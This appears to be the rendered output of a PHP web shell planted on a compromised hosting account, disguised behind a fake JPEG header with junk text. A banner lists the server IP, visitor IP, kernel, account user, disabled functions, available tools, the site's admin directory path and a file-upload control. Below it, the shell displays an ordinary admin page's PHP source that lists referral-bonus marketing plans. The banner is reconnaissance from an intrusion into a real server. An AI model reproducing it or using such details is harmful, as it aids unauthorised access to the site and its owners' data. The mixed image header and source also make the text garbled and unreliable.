���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/chocolate-mouse-719686.hostingersite.com/public_html/admin/ |
Upload File : |
<?php require_once 'header.php'; ?> <!--start page wrapper --> <div class="page-wrapper"> <div class="page-content"> <!--breadcrumb--> <div class="page-breadcrumb d-none d-sm-flex align-items-center mb-3"> <div class="breadcrumb-title pe-3"><?= $page ?></div> <div class="ps-3"> <nav aria-label="breadcrumb"> <ol class="breadcrumb mb-0 p-0"> <li class="breadcrumb-item"><a href="javascript:;"><i class="bx bx-home-alt"></i></a> </li> <li class="breadcrumb-item active" aria-current="page"><?= $page ?></li> </ol> </nav> </div> </div> <!--end breadcrumb--> <div class="container"> <div class="main-body py-5"> <h6 class="mb-0 text-uppercase">Plan Details</h6> <hr /> <div class="card"> <div class="card-body"> <div class="table-responsive"> <table id="example2" class="table table-striped table-bordered"> <thead> <tr> <th>#</th> <th>Plan Name</th> <th>Price</th> <th>Total Amount</th> <th>GST</th> <th>Ref. By Bonus</th> <th>Ref. To Bonus</th> <th>Pairing Limit</th> <th>Flush Policy</th> <th>Carry Forward</th> <th>Action</th> </tr> </thead> <tbody> <?php $i = 1; $plan = "SELECT * FROM `plans` WHERE status = 1"; $res = mysqli_query($conn, $plan); while ($row = mysqli_fetch_array($res)) : ?> <tr> <td><?= $i++; ?></td> <td><?= $row['name']; ?></td> <td><?= $row['price']; ?></td> <td><?= $row['total_amount']; ?></td> <td><?= $row['gst_amount']; ?></td> <td><?= $row['refer_by_bonus']; ?></td> <td><?= $row['refer_to_bonus']; ?></td> <td><?= $row['pairing_limit']; ?></td> <td><?= ucfirst($row['flush_out_policy']); ?></td> <td><?= $row['carry_forward'] == 1 ? 'Yes' : 'No'; ?></td> <td><a href="update-plan?id=<?php echo base64_encode($row['id']) ?>"><span class="underline">Edit</span></a></td> </tr> <?php endwhile; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> <!--end page wrapper --> <?php require_once 'footer.php'; ?>